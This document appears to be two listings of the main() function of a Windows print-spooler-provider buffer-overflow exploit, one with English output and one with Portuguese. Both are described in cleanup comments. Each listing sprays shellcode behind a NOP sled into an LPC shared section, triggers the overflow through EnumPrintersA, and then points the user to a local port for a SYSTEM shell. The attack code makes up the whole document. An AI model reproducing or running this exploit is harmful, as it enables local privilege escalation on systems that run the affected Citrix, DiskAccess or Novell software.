Example #1
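/*
 * Program entry point for the spooler-provider overflow proof of concept.
 *
 * What this function does, as visible in this file:
 *   1. Calls ConnectToLPCPort() at most MAXLOOPS times until the server-side
 *      address of the mapped section (dirs.HighPart) has a zero top byte.
 *      dirs.LowPart == 0 is treated as "could not reach the port".
 *   2. Fills `exploit` with the second byte (bits 16..23) of that server
 *      address, NUL-terminated, so the whole string is one repeated byte.
 *   3. Fills `buffer` with 0x90, copies `shellcode` 10 bytes short of its
 *      end, and writes it into the local view of the section through
 *      WriteProcessMemory on the current process.
 *   4. Passes `exploit` as the name argument of EnumPrintersA.
 *
 * Names used but defined elsewhere in the file: BOFSIZE, REQUIRED_SIZE,
 * MAXLOOPS, shellcode[] and ConnectToLPCPort(). The Windows types and calls
 * come from headers that are outside this listing.
 *
 * Exit status is kept exactly as the original had it: 1 once EnumPrintersA
 * has been called, 0 on every failure path (the reverse of the usual
 * convention; scripts checking the exit code should keep that in mind).
 *
 * Changes relative to the original listing:
 *   - the "return address" report no longer reads exploit[262], which is an
 *     out-of-bounds read whenever BOFSIZE <= 262 and the terminator when
 *     BOFSIZE == 263; every sled byte holds the fill value, so that is printed;
 *   - the shellcode placement is checked against REQUIRED_SIZE before the
 *     memcpy so a too-small section cannot wrap the index;
 *   - the OpenProcess handle is closed on every path, and GetLastError() is
 *     captured before CloseHandle() can overwrite it;
 *   - printf arguments are cast to the type each conversion expects;
 *   - `write` is initialised so a failed WriteProcessMemory does not print an
 *     indeterminate value; the unused `datalen` local is gone.
 */
int main(int argc, char* argv[])
{
    unsigned char exploit[BOFSIZE];
    unsigned char buffer[REQUIRED_SIZE];
    DWORD dwSizeNeeded = 0, dwReturned = 0, n = 0;
    LARGE_INTEGER dirs;
    HANDLE hProcess;
    DWORD write = 0;
    DWORD err;
    int written;
    char *p;
    unsigned char i;   /* one byte of the server address; unsigned so `i != 0` is an unambiguous byte test */
#define lpLocalAddress dirs.LowPart
#define lpTargetAddress dirs.HighPart

    (void)argc;
    (void)argv;

    printf("[+] Universal exploit for printer spooler providers\n");
    printf("[+] Some Citrix metaframe, DiskAccess and Novel versions are affected\n");
    printf("[+] Exploit by Andres Tarasco - [email protected]\n\n");

    printf("[+] Connecting to spooler LCP port \\RPC Control\\spoolss\n");

    /* Reconnect until the server-side address has a zero top byte, or give up
       after MAXLOOPS attempts. */
    do {
        dirs = ConnectToLPCPort();
        printf("[+] Trying to locate valid address: Found 0x%8.8x after %i tries\r",
               (unsigned)lpTargetAddress, (int)(n + 1));
        if (lpLocalAddress == 0) {
            printf("\n[-] Unable to connect to spooler LPC port\n");
            printf("[-] Check if the service is running\n");
            exit(0);
        }
        i = (unsigned char)(lpTargetAddress >> 24);   /* top byte of the server address */
        n++;
        if (n == MAXLOOPS) {
            printf("\n[-] Unable to locate a valid address after %i tries\n", (int)n);
            printf("[?] Maybe a greater REQUIRED_SIZE should help. Try increasing it\n");
            return 0;
        }
    } while (i != 0);

    printf("\n");

    printf("[+] Mapped memory. Client address: 0x%8.8x\n", (unsigned)lpLocalAddress);
    printf("[+] Mapped memory. Server address: 0x%8.8x\n", (unsigned)lpTargetAddress);

    /* Bits 16..23 of the server address (same value as the original
       `(lpTargetAddress<<8)>>24` truncated to a byte). The whole exploit
       string is this byte repeated; the original comment says it does not
       matter where in the string the return address lands. */
    i = (unsigned char)((lpTargetAddress >> 16) & 0xFF);
    memset(exploit, i, sizeof(exploit));
    exploit[sizeof(exploit) - 1] = '\0';

    /* Every sled byte is `i`, so report it directly rather than indexing a
       fixed offset that BOFSIZE may not cover. The 0x00XX00XX shape of the
       report suggests the server widens the name to 16-bit characters --
       inferred from the format string, not verifiable from this file. */
    printf("[+] Targeting return address to  : 0x00%2.2X00%2.2X\n", i, i);

    p = (char *)lpLocalAddress;

    /* NOP sled with the shellcode placed 10 bytes short of the end of the
       section. Guard the subtraction: with a small REQUIRED_SIZE the original
       index wrapped and the memcpy wrote outside `buffer`. */
    if (sizeof(buffer) < sizeof(shellcode) + 10) {
        printf("[-] REQUIRED_SIZE is too small to hold the shellcode\n");
        return 0;
    }
    memset(buffer, 0x90, sizeof(buffer));
    memcpy(&buffer[sizeof(buffer) - sizeof(shellcode) - 10], shellcode, sizeof(shellcode));

    printf("[+] Writting to shared memory...\n");
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
    if (hProcess == NULL) {
        printf("[-] Something failed. Error %i - Good luck next time\n", (int)GetLastError());
        return 0;
    }

    /* Writing to our own process through WriteProcessMemory is kept from the
       original; presumably the section view is not directly writable, but
       that is not shown here. Capture the error before closing the handle,
       since CloseHandle() may reset it. */
    written = WriteProcessMemory(hProcess, p, buffer, sizeof(buffer), &write);
    err = GetLastError();
    CloseHandle(hProcess);

    if (!written) {
        printf("[-] Written 0x%x bytes \n", (unsigned)write);
        printf("[-] Something failed. Error %i - Good luck next time\n", (int)err);
        return 0;
    }

    printf("[+] Written 0x%x bytes \n", (unsigned)write);
    printf("[+] Exploiting vulnerability....\n");
    printf("[+] Exploit complete. Now try to connect to 127.0.0.1:51477\n");
    printf("[+] and check if you are system =)\n");
    EnumPrintersA(PRINTER_ENUM_NAME, (char *)exploit, 1, NULL, 0, &dwSizeNeeded, &dwReturned);
    return 1;
}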
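/*
 * Program entry point (Portuguese-language variant of the same proof of
 * concept; only the messages differ from the English listing).
 *
 * What this function does, as visible in this file:
 *   1. Calls ConnectToLPCPort() at most MAXLOOPS times until the server-side
 *      address of the mapped section (dirs.HighPart) has a zero top byte.
 *      dirs.LowPart == 0 is treated as "could not reach the port".
 *   2. Fills `exploit` with the second byte (bits 16..23) of that server
 *      address, NUL-terminated, so the whole string is one repeated byte.
 *   3. Fills `buffer` with 0x90, copies `shellcode` 10 bytes short of its
 *      end, and writes it into the local view of the section through
 *      WriteProcessMemory on the current process.
 *   4. Passes `exploit` as the name argument of EnumPrintersA.
 *
 * Names used but defined elsewhere in the file: BOFSIZE, REQUIRED_SIZE,
 * MAXLOOPS, shellcode[] and ConnectToLPCPort(). The Windows types and calls
 * come from headers that are outside this listing.
 *
 * Exit status is kept exactly as the original had it: 1 once EnumPrintersA
 * has been called, 0 on every failure path (the reverse of the usual
 * convention; scripts checking the exit code should keep that in mind).
 *
 * Changes relative to the original listing:
 *   - the "return address" report no longer reads exploit[262], which is an
 *     out-of-bounds read whenever BOFSIZE <= 262 and the terminator when
 *     BOFSIZE == 263; every sled byte holds the fill value, so that is printed;
 *   - the shellcode placement is checked against REQUIRED_SIZE before the
 *     memcpy so a too-small section cannot wrap the index;
 *   - the OpenProcess handle is closed on every path, and GetLastError() is
 *     captured before CloseHandle() can overwrite it;
 *   - printf arguments are cast to the type each conversion expects;
 *   - `write` is initialised so a failed WriteProcessMemory does not print an
 *     indeterminate value; the unused `datalen` local is gone.
 */
int main(int argc, char* argv[])
{
  unsigned char exploit[BOFSIZE];
  unsigned char buffer[REQUIRED_SIZE];
  DWORD dwSizeNeeded = 0, dwReturned = 0, n = 0;
  LARGE_INTEGER dirs;
  HANDLE hProcess;
  DWORD write = 0;
  DWORD err;
  int written;
  char *p;
  unsigned char i;   /* one byte of the server address; unsigned so `i != 0` is an unambiguous byte test */
  #define lpLocalAddress dirs.LowPart
  #define lpTargetAddress dirs.HighPart

  (void)argc;
  (void)argv;

  printf("[+] Exploit universal para provedores de impressão\n");
  printf("[+] Talvez o Citrix metaframe, DiskAccess ou Novel suas versões foram afetadas\n");
  printf("[+] Exploit by Drago\n\n");

  printf("[+] Conectando a porta de spooler LCP \\RPC Control\\spoolss\n");

  /* Reconnect until the server-side address has a zero top byte, or give up
     after MAXLOOPS attempts. */
  do {
    dirs = ConnectToLPCPort();
    printf("[+] Tente localizar um endereço valido: Encontrados 0x%8.8x após %i tentativas\r",
           (unsigned)lpTargetAddress, (int)(n + 1));
    if (lpLocalAddress == 0) {
      printf("\n[-] Não foi possivel se conectar a porta de spooler LPC\n");
      printf("[-] Verifique se o serviço está rodando\n");
      exit(0);
    }
    i = (unsigned char)(lpTargetAddress >> 24);   /* top byte of the server address */
    n++;
    if (n == MAXLOOPS) {
      printf("\n[-] Não é possível localizar um endereço válido após %i tries\n", (int)n);
      printf("[?] Talvez o valor REQUIRED_SIZE deve ajudar. Tente aumenta-lo\n");
      return 0;
    }
  } while (i != 0);

  printf("\n");

  printf("[+] Memoria mapeada. Endereço do cliente: 0x%8.8x\n", (unsigned)lpLocalAddress);
  printf("[+] Memoria mapeada. Endereço do servidor: 0x%8.8x\n", (unsigned)lpTargetAddress);

  /* Bits 16..23 of the server address (same value as the original
     `(lpTargetAddress<<8)>>24` truncated to a byte). The whole exploit
     string is this byte repeated; the original comment says it does not
     matter where in the string the return address lands. */
  i = (unsigned char)((lpTargetAddress >> 16) & 0xFF);
  memset(exploit, i, sizeof(exploit));
  exploit[sizeof(exploit) - 1] = '\0';

  /* Every sled byte is `i`, so report it directly rather than indexing a
     fixed offset that BOFSIZE may not cover. The 0x00XX00XX shape of the
     report suggests the server widens the name to 16-bit characters --
     inferred from the format string, not verifiable from this file. */
  printf("[+] Alvejando o endereço de retorno para  : 0x00%2.2X00%2.2X\n", i, i);

  p = (char *)lpLocalAddress;

  /* NOP sled with the shellcode placed 10 bytes short of the end of the
     section. Guard the subtraction: with a small REQUIRED_SIZE the original
     index wrapped and the memcpy wrote outside `buffer`. */
  if (sizeof(buffer) < sizeof(shellcode) + 10) {
    printf("[-] REQUIRED_SIZE is too small to hold the shellcode\n");
    return 0;
  }
  memset(buffer, 0x90, sizeof(buffer));
  memcpy(&buffer[sizeof(buffer) - sizeof(shellcode) - 10], shellcode, sizeof(shellcode));

  printf("[+] Escrevendo memória compartilhada...\n");
  hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
  if (hProcess == NULL) {
    printf("[-] Alguma coisa deu errado. Error %i - Boa sorte na proxima\n", (int)GetLastError());
    return 0;
  }

  /* Writing to our own process through WriteProcessMemory is kept from the
     original; presumably the section view is not directly writable, but
     that is not shown here. Capture the error before closing the handle,
     since CloseHandle() may reset it. */
  written = WriteProcessMemory(hProcess, p, buffer, sizeof(buffer), &write);
  err = GetLastError();
  CloseHandle(hProcess);

  if (!written) {
    printf("[-] Escrito 0x%x bytes \n", (unsigned)write);
    printf("[-] Alguma coisa deu errado. Error %i - Boa sorte na proxima\n", (int)err);
    return 0;
  }

  printf("[+] Ecrever 0x%x bytes \n", (unsigned)write);
  printf("[+] Explorando vulnerabilidade....\n");
  printf("[+] Exploit completo. Agora tente conectar a 127.0.0.1:51477\n");
  printf("[+] e verifique se você é o sistema =)\n");
  EnumPrintersA(PRINTER_ENUM_NAME, (char *)exploit, 1, NULL, 0, &dwSizeNeeded, &dwReturned);
  return 1;
}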